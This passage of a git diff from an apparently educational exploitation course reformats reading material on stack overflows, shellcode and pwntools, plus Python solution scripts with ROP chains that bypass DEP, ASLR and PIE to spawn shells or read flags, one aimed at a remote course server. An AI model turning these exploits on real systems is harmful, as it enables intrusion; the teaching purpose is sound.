flow, but also place a shellcode on the stack using the buggy read. +There are two regions where we can do this: -* between the buffer start and the saved return. The number of bytes we can write here is determined by _how much space was allocated on the stack_. -* after the saved return. The number of bytes we can write here is determined by _how many bytes are read_. +- between the buffer start and the saved return address: + The number of bytes we can write here is determined by **how much space was allocated on the stack**. +- after the saved return address: + The number of bytes we can write here is determined by **how many bytes are read**. -If any of these regions is too small, we can try the other one. If both of them are too small, that's a problem. However, note that shellcodes are usually tiny. +If any of these regions is too small, we can try the other one. +If both of them are too small, that's a problem. +However, note that shellcodes are usually tiny. -## 09. Challenge: shellcode after saved ret - no leak +### 09. Challenge: Shellcode after Saved Return Address - No Leak -This is the same as the previous challenge, only this time the executable does not conveniently leak the buffer's address. So you will have to deal with the differences between running a binary inside and outside of `gdb` to precisely determine the necessary address, then jump to it. +This is the same as the previous challenge, only this time the executable does not conveniently leak the buffer's address. +So you will have to deal with the differences between running a binary inside and outside of `gdb` to precisely determine the necessary address, then jump to it. -## 10. Challenge: shellcode as command line arg +### 10. Challenge: Shellcode as Command Line Argument -As mentioned in the introduction, reading from stdin or from a file isn't the only way to place content inside the memory space of a process. If we can launch the executable, we can modify its environment or command line arguments. The fact that a program might not use its arguments or environment is irrelevant, the loader can't know this, so it places them in the address space anyway. +As mentioned in the introduction, reading from standard input or from a file isn't the only way to place content inside the memory space of a process. +If we can launch the executable, we can modify its environment or command line arguments. +The fact that a program might not use its arguments or environment is irrelevant, the loader can't know this, so it places them in the address space anyway. Take the `/bin/sh` shellcode and feed it to the program as a command-line argument, then exploit the SBO to actually run it. -## 11. Challenge: shellcode in the environment +### 11. Challenge: Shellcode in the Environment Take the `/bin/sh` shellcode and place it in the environment, then exploit the SBO to actually run it. -# Further Reading +## Further Reading -["Smashing The Stack For Fun And Profit", Aleph One](http://phrack.org/issues/49/14.html) - a legendary attack paper documenting SBOs and shellcodes. As it is written in '96, the examples in it will probably _not_ work (either out-of-the-box or with some tweaks). We recommend perusing it for its historical/cultural significance, but don't waste much time on the technical details of the examples. +["Smashing The Stack For Fun And Profit", Aleph One](http://phrack.org/issues/49/14.html) - a legendary attack paper documenting SBOs and shellcodes. +As it is written in '96, the examples in it will probably _not_ work (either out-of-the-box or with some tweaks). +We recommend perusing it for its historical/cultural significance, but don't waste much time on the technical details of the examples. -# Resources +## Resources [Shell-storm](http://shell-storm.org/shellcode/) - a repository of shellcodes. diff --git a/extra/pwntools-intro/README.md b/chapters/extra/pwntools-intro/reading/README.md similarity index 78% rename from extra/pwntools-intro/README.md rename to chapters/extra/pwntools-intro/reading/README.md index 5ed56cd..3a389ab 100644 --- a/extra/pwntools-intro/README.md +++ b/chapters/extra/pwntools-intro/reading/README.md @@ -1,17 +1,16 @@ # Pwntools Tutorial ---- -Even though pwntools is an excellent CTF framework, it is also an exploit development library. It was developed by Gallopsled, a European CTF team, under the context that exploit developers have been writing the same tools over and over again with different variations. Pwntools comes to level the playing field and bring together developers to create a common framework of tools. +Even though pwntools is an excellent CTF framework, it is also an exploit development library. +It was developed by Gallopsled, a European CTF team, under the context that exploit developers have been writing the same tools over and over again with different variations. +Pwntools comes to level the playing field and bring together developers to create a common framework of tools. ## Installation ---- -```bash -$ pip install -U pwntools +```console +pip install -U pwntools ``` -## Local and remote I/O ---- +## Local and Remote I/O Pwntools enables you to dynamically interact (through scripting) with either local or remote processes, as follows: @@ -73,7 +72,7 @@ io.interactive() If we run the previous script, we get the following output: -``` +```text [+] Starting local process './leaky': Done Got: Okay, here you go: 0xffe947d8 S @@ -83,7 +82,8 @@ Got: Okay, here you go: 0xffe947d8 S $ ``` -Notice the $ prompt which still awaits input from us to feed the process. This is due to the `io.interactive()` line at the end of the script. +Notice the `$` prompt which still awaits input from us to feed the process. +This is due to the `io.interactive()` line at the end of the script. We can encapsulate the previous sequence of interactions inside a function which we can loop. @@ -126,9 +126,10 @@ The flag is: SECRETFLAG ``` ## Logging ---- -The previous example was a bit… quiet. Fortunately, pwntools has nicely separated logging capabilities to make things more verbose for debugging and progress-viewing purposes. Let's log each of our steps within the `leak_char` function. +The previous example was a bit... quiet. +Fortunately, pwntools has nicely separated logging capabilities to make things more verbose for debugging and progress-viewing purposes. +Let's log each of our steps within the `leak_char` function. ```python def leak_char(offset): @@ -151,7 +152,7 @@ def leak_char(offset): Now the output should be much more verbose: -``` +```text [+] Starting local process './leaky': Done [*] Sending request for offset: -10 [*] Got back raw response: Okay, here you go: 0xffb14948 S @@ -188,7 +189,6 @@ Now the output should be much more verbose: ``` ## Assembly and ELF manipulation ---- Pwntools can also be used for precision work, like working with ELF files and their symbols. @@ -206,7 +206,8 @@ log.info("Main at: " + hex(main_addr)) log.info(disasm(leaky_elf.read(main_addr, 14), arch='x86')) ``` -We can also write ELF files from raw assembly; this is very useful for testing shellcodes. +We can also write ELF files from raw assembly; +this is very useful for testing shellcodes. ```python #!/usr/bin/env python @@ -229,14 +230,14 @@ with open('test_shell', 'wb') as f: f.write(e.get_data()) ``` -> This will result in a binary named test_shell which executes the necessary assembly code to spawn a shell. -> ```bash -> $ chmod u+x test_shell -> $ ./test_shell -> ``` +This will result in a binary named `test_shell` which executes the necessary assembly code to spawn a shell: + +```console +chmod u+x test_shell +./test_shell +``` ## Shellcode generation ---- Pwntools comes with the `shellcraft` module, which is quite extensive in its capabilities. @@ -286,25 +287,26 @@ These shellcodes can be directly assembled using asm inside your script, and giv ''', arch = 'amd64') ``` +Most of the time you'll be working with as specific vulnerable program. +To avoid specifying architecture for the asm function or to shellcraft you can define the context at the start of the script which will imply the architecture from the binary header. -> Most of the time you'll be working with as specific vulnerable program. To avoid specifing architecture for the asm function or to shellcraft you can define the context at the start of the script which will imply the architecture from the binary header. -> ```python -> context.binary = './vuln_program' -> -> shellcode = asm(''' -> mov rdi, 0 -> mov rax, 60 -> syscall -> ''') -> print(shellcraft.sh()) -> ``` +```python +context.binary = './vuln_program' + +shellcode = asm(''' + mov rdi, 0 + mov rax, 60 + syscall +''') +print(shellcraft.sh()) +``` ## GDB integration ---- Most importantly, pwntools provides GDB integration, which is extremely useful. Let's follow an example using the following program: + ```asm extern gets extern printf @@ -327,13 +329,16 @@ main: leave ret ``` + Compile it with: -```bash -$ nasm vuln.asm -felf64 -$ gcc -no-pie -fno-pic -fno-stack-protector -z execstack vuln.o -o vuln + +```console +nasm vuln.asm -felf64 +gcc -no-pie -fno-pic -fno-stack-protector -z execstack vuln.o -o vuln ``` Use this script to exploit the program: + ```python #!/usr/bin/env python from pwn import * @@ -379,7 +384,11 @@ p.sendline(payload) p.interactive() ``` -Notice the `gdb.attach(p)` and raw_input lines. The former will open a new terminal window with GDB already attached. All of your GDB configurations will be used, so this works with PEDA as well. Let's set a breakpoint at the ret instruction from the main function: +Notice the `gdb.attach(p)` and raw_input lines. +The former will open a new terminal window with GDB already attached. +All of your GDB configurations will be used, so this works with PEDA as well. +Let's set a breakpoint at the ret instruction from the main function: + ```gdb gdb-peda$ pdis main Dump of assembler code for function main: @@ -403,6 +412,9 @@ gdb-peda$ c Continuing. ``` -The continue command will return control to the terminal in which we're running the pwntools script. This is where the raw_input comes in handy, because it will wait for you to say “go” before proceeding further. Now if you hit `` at the Send payload? prompt, you will notice that GDB has reached the breakpoint you've previously set. +The continue command will return control to the terminal in which we're running the pwntools script. +This is where the `raw_input()` function comes in handy, because it will wait for you to say`“go` before proceeding further. +Now if you hit `` at the `Send payload?` prompt, you will notice that GDB has reached the breakpoint you've previously set. -You can now single-step each instruction of the shellcode inside GDB to see that everything is working properly. Once you reach int `0x80`, you can continue again (or close GDB altogether) and interact with the newly spawned shell in the pwntools session. +You can now single-step each instruction of the shellcode inside GDB to see that everything is working properly. +Once you reach int `0x80`, you can continue again (or close GDB altogether) and interact with the newly spawned shell in the pwntools session. diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit.py index 87f9a1e..18472a7 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) hidden_address = e.symbols["hidden"] @@ -31,6 +31,6 @@ log.info("payload: " + "".join("\\x{:02x}".format(ord(i)) for i in payload)) io = process(binary) -#gdb.attach(io) +# gdb.attach(io) io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit3.py index 7109b0d..97a3c95 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) hidden_address = e.symbols[b"hidden"] @@ -31,6 +31,6 @@ log.info("payload: " + "".join("\\x{:02x}".format(i) for i in payload)) io = process(binary) -#gdb.attach(io) +# gdb.attach(io) io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit.py index ea4dcb7..6a162f1 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) # XXX: We need to add 4 to the PLT address returned by pwntools on ELF files. @@ -31,10 +31,16 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * "A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address) + pack(system_plt_address) +payload = ( + offset * "A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address) + + pack(system_plt_address) +) log.info("payload: " + "".join("\\x{:02x}".format(ord(i)) for i in payload)) io = process(binary) -#gdb.attach(io) +# gdb.attach(io) io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit3.py index 7dfd43a..d09a258 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) # XXX: We need to add 4 to the PLT address returned by pwntools on ELF files. @@ -31,10 +31,16 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * b"A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address) + pack(system_plt_address) +payload = ( + offset * b"A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address) + + pack(system_plt_address) +) log.info("payload: " + "".join("\\x{:02x}".format(i) for i in payload)) io = process(binary) -#gdb.attach(io) +# gdb.attach(io) io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/README.md b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/README.md index 1f63607..2e5fa7a 100644 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/README.md +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/README.md @@ -1,12 +1,12 @@ This exploit works with ASLR disabled. To disable ASLR (it's enabled by default on Linux) use: -``` +```console setarch x86_64 -R /bin/bash ``` We find the non-randomized address of the `puts` function in the standard C library by using GDB: -``` +```console $ gdb ./vuln Reading symbols from ./vuln...done. (gdb) start @@ -15,6 +15,7 @@ Starting program: /home/razvan/projects/ctf/sss/sss-exploit-internal.git/session Temporary breakpoint 1, main () at vuln.c:13 13 puts("Hello"); + (gdb) p puts $1 = {int (const char *)} 0x7ffff7a64a30 <_IO_puts> ``` diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/exploit3.py index 8e78537..739471a 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) @@ -24,7 +24,7 @@ offset = 0x28 # This is determined by dynamic analysis (using GDB). See README.md. -puts_address_in_libc = 0x7ffff7a64a30 +puts_address_in_libc = 0x7FFFF7A64A30 libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") puts_offset_in_libc = libc.symbols[b"puts"] @@ -44,10 +44,16 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * b"A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address_in_libc) + pack(system_address_in_libc) +payload = ( + offset * b"A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address_in_libc) + + pack(system_address_in_libc) +) log.info("payload: " + "".join("\\x{:02x}".format(i) for i in payload)) -#gdb.attach(io) +# gdb.attach(io) io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit.py index 2ccef68..b03d144 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) main_address = e.symbols["main"] @@ -32,14 +32,20 @@ # 1st stage payload -payload = offset * "A" + pack(pop_rdi_ret) + pack(puts_got_address) + pack(puts_plt_address) + pack(main_address) +payload = ( + offset * "A" + + pack(pop_rdi_ret) + + pack(puts_got_address) + + pack(puts_plt_address) + + pack(main_address) +) log.info("1st stage payload: " + "".join("\\x{:02x}".format(ord(i)) for i in payload)) io.sendline(payload) io.recvline() msg = io.recvline() msg = msg.strip() -msg = msg + (8-len(msg)) * "\x00" +msg = msg + (8 - len(msg)) * "\x00" puts_address_in_libc = unpack(msg) log.info("puts_address_in_libc: 0x{:016x}".format(puts_address_in_libc)) @@ -61,9 +67,15 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * "A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address_in_libc) + pack(system_address_in_libc) +payload = ( + offset * "A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address_in_libc) + + pack(system_address_in_libc) +) log.info("2nd stage payload: " + "".join("\\x{:02x}".format(ord(i)) for i in payload)) -#gdb.attach(io) +# gdb.attach(io) io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit3.py index b9f6da9..51f1bfe 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) main_address = e.symbols[b"main"] @@ -32,14 +32,20 @@ # 1st stage payload -payload = offset * b"A" + pack(pop_rdi_ret) + pack(puts_got_address) + pack(puts_plt_address) + pack(main_address) +payload = ( + offset * b"A" + + pack(pop_rdi_ret) + + pack(puts_got_address) + + pack(puts_plt_address) + + pack(main_address) +) log.info("1st stage payload: " + "".join("\\x{:02x}".format(i) for i in payload)) io.sendline(payload) io.recvline() msg = io.recvline() msg = msg.strip() -msg = msg + (8-len(msg)) * b"\x00" +msg = msg + (8 - len(msg)) * b"\x00" puts_address_in_libc = unpack(msg) log.info("puts_address_in_libc: 0x{:016x}".format(puts_address_in_libc)) @@ -61,10 +67,18 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * b"A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address_in_libc) + pack(system_address_in_libc) -log.info("2nd stage 2nd stage payload: " + "".join("\\x{:02x}".format(i) for i in payload)) - -#gdb.attach(io) +payload = ( + offset * b"A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address_in_libc) + + pack(system_address_in_libc) +) +log.info( + "2nd stage 2nd stage payload: " + "".join("\\x{:02x}".format(i) for i in payload) +) + +# gdb.attach(io) io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/05-tutorial-bypass-dep-aslr-pie-rop/sol_pie_bypass.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/05-tutorial-bypass-dep-aslr-pie-rop/sol_pie_bypass.py index 6c38ecc..465a0a4 100644 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/05-tutorial-bypass-dep-aslr-pie-rop/sol_pie_bypass.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/05-tutorial-bypass-dep-aslr-pie-rop/sol_pie_bypass.py @@ -1,27 +1,30 @@ from pwn import * -p = process('./rwslotmachine7') +p = process("./rwslotmachine7") libc = ELF("./libc.so.6") + def do_read(idx): - p.recvuntil('>') - p.sendline('1') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil(']: ') - return int(p.recvuntil('\n')[:-1], 16) + p.recvuntil(">") + p.sendline("1") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("]: ") + return int(p.recvuntil("\n")[:-1], 16) + def do_write(idx, value): - p.recvuntil('>') - p.sendline('2') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil('value:') - p.sendline(hex(value)) - -slots_offset = p.elf.symbols['slots'] -strtoll_got_offset = p.elf.got['strtoll'] -puts_got_offset = p.elf.got['puts'] + p.recvuntil(">") + p.sendline("2") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("value:") + p.sendline(hex(value)) + + +slots_offset = p.elf.symbols["slots"] +strtoll_got_offset = p.elf.got["strtoll"] +puts_got_offset = p.elf.got["puts"] dso_handle_offset = p.elf.bss() - 4 index_to_puts = (puts_got_offset - slots_offset) / 4 @@ -32,27 +35,27 @@ def do_write(idx, value): libc_base = libc_leak - libc.symbols["puts"] pie_leak = do_read(index_to_dso_handle) -pie_base = (pie_leak & 0xfffff000) - 0x3000 +pie_base = (pie_leak & 0xFFFFF000) - 0x3000 print(hex(pie_base)) -libc_gadget_esp_30 = libc_base + 0xdbe1c -pop3 = pie_base + 0xbe9 -pop2 = pie_base + 0xbea +libc_gadget_esp_30 = libc_base + 0xDBE1C +pop3 = pie_base + 0xBE9 +pop2 = pie_base + 0xBEA pop1 = pie_base + 0x551 filename_payload = unpack_many("./flag\x00\x00", 32) for i in range(len(filename_payload)): - do_write(i, filename_payload[i]) + do_write(i, filename_payload[i]) open_ = libc_base + libc.symbols["open"] read_ = libc_base + libc.symbols["read"] write_ = libc_base + libc.symbols["write"] -rop = p32(open_) + p32(pop2) + p32(pie_base + slots_offset) + p32(0) +rop = p32(open_) + p32(pop2) + p32(pie_base + slots_offset) + p32(0) rop += p32(read_) + p32(pop3) + p32(3) + p32(pie_base + slots_offset) + p32(0x50) rop += p32(write_) + p32(pop3) + p32(1) + p32(pie_base + slots_offset) + p32(0x50) do_write(index_to_strtoll, libc_gadget_esp_30) -p.sendline('A' * 0xc + rop) +p.sendline("A" * 0xC + rop) p.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/06-challenge-bypass-dep-system-sh-present/sol/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/06-challenge-bypass-dep-system-sh-present/sol/exploit3.py index ee48dc9..28617b9 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/06-challenge-bypass-dep-system-sh-present/sol/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/06-challenge-bypass-dep-system-sh-present/sol/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) hidden_address = e.symbols[b"hidden"] @@ -31,7 +31,7 @@ log.info("payload: " + "".join("\\x{:02x}".format(i) for i in payload)) io = process(binary) -#gdb.attach(io) +# gdb.attach(io) io.sendline("Ana") io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/07-challenge-bypass-dep-system-sh-separate/sol/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/07-challenge-bypass-dep-system-sh-separate/sol/exploit3.py index 0d2cb33..8b79ca8 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/07-challenge-bypass-dep-system-sh-separate/sol/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/07-challenge-bypass-dep-system-sh-separate/sol/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) # XXX: We need to add 4 to the PLT address returned by pwntools on ELF files. @@ -31,11 +31,17 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * b"A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address) + pack(system_plt_address) +payload = ( + offset * b"A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address) + + pack(system_plt_address) +) log.info("payload: " + "".join("\\x{:02x}".format(i) for i in payload)) io = process(binary) -#gdb.attach(io) +# gdb.attach(io) io.sendline("Ana") io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/README.md b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/README.md index 577d324..689746d 100644 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/README.md +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/README.md @@ -1,5 +1,5 @@ Assume ASLR disabled. To disable ASLR (it's enabled by default on Linux) use: -``` +```console setarch x86_64 -R /bin/bash ``` diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/sol/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/sol/exploit3.py index 35a5ec6..0a5c72c 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/sol/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/08-challenge-bypass-dep-no-aslr-libc/sol/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) main_address = e.symbols[b"main"] @@ -28,7 +28,7 @@ # offset is rbp+0x8-(rbp-0x20) = 0x28 offset = 0x38 -puts_address_in_libc = 0x7ffff7a64a30 +puts_address_in_libc = 0x7FFFF7A64A30 log.info("puts_address_in_libc: 0x{:016x}".format(puts_address_in_libc)) libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") @@ -47,11 +47,19 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * b"A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address_in_libc) + pack(system_address_in_libc) -log.info("2nd stage 2nd stage payload: " + "".join("\\x{:02x}".format(i) for i in payload)) +payload = ( + offset * b"A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address_in_libc) + + pack(system_address_in_libc) +) +log.info( + "2nd stage 2nd stage payload: " + "".join("\\x{:02x}".format(i) for i in payload) +) io = process(binary) -#gdb.attach(io) +# gdb.attach(io) io.sendline("Ana") io.sendline(payload) diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/09-challenge-bypass-dep-aslr-libc/sol/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/09-challenge-bypass-dep-aslr-libc/sol/exploit3.py index 11f62f2..8165fda 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/09-challenge-bypass-dep-aslr-libc/sol/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/09-challenge-bypass-dep-aslr-libc/sol/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) main_address = e.symbols[b"main"] @@ -32,7 +32,13 @@ # 1st stage payload -payload = offset * b"A" + pack(pop_rdi_ret) + pack(puts_got_address) + pack(puts_plt_address) + pack(main_address) +payload = ( + offset * b"A" + + pack(pop_rdi_ret) + + pack(puts_got_address) + + pack(puts_plt_address) + + pack(main_address) +) log.info("1st stage payload: " + "".join("\\x{:02x}".format(i) for i in payload)) io.sendline("Ana") @@ -41,7 +47,7 @@ io.sendline(payload) msg = io.recvline() msg = msg.strip()[16:] -msg = msg + (8-len(msg)) * b"\x00" +msg = msg + (8 - len(msg)) * b"\x00" puts_address_in_libc = unpack(msg) log.info("puts_address_in_libc: 0x{:016x}".format(puts_address_in_libc)) @@ -63,10 +69,18 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * b"A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address_in_libc) + pack(system_address_in_libc) -log.info("2nd stage 2nd stage payload: " + "".join("\\x{:02x}".format(i) for i in payload)) - -#gdb.attach(io) +payload = ( + offset * b"A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address_in_libc) + + pack(system_address_in_libc) +) +log.info( + "2nd stage 2nd stage payload: " + "".join("\\x{:02x}".format(i) for i in payload) +) + +# gdb.attach(io) io.sendline("Ana") io.recvline() io.recvline() diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py index e87a150..40d3c52 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py @@ -7,38 +7,41 @@ SOLUTION = 1 if local: - p = process('../src/rwslotmachine1') + p = process("../src/rwslotmachine1") else: - p = remote('141.85.224.117', 31344) + p = remote("141.85.224.117", 31344) + def do_read(idx): - p.recvuntil('>') - p.sendline('1') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil(']: ') - return int(p.recvuntil('\n')[:-1], 16) + p.recvuntil(">") + p.sendline("1") + p.recvuntil("index:") + p.sendline(str(idx)) + 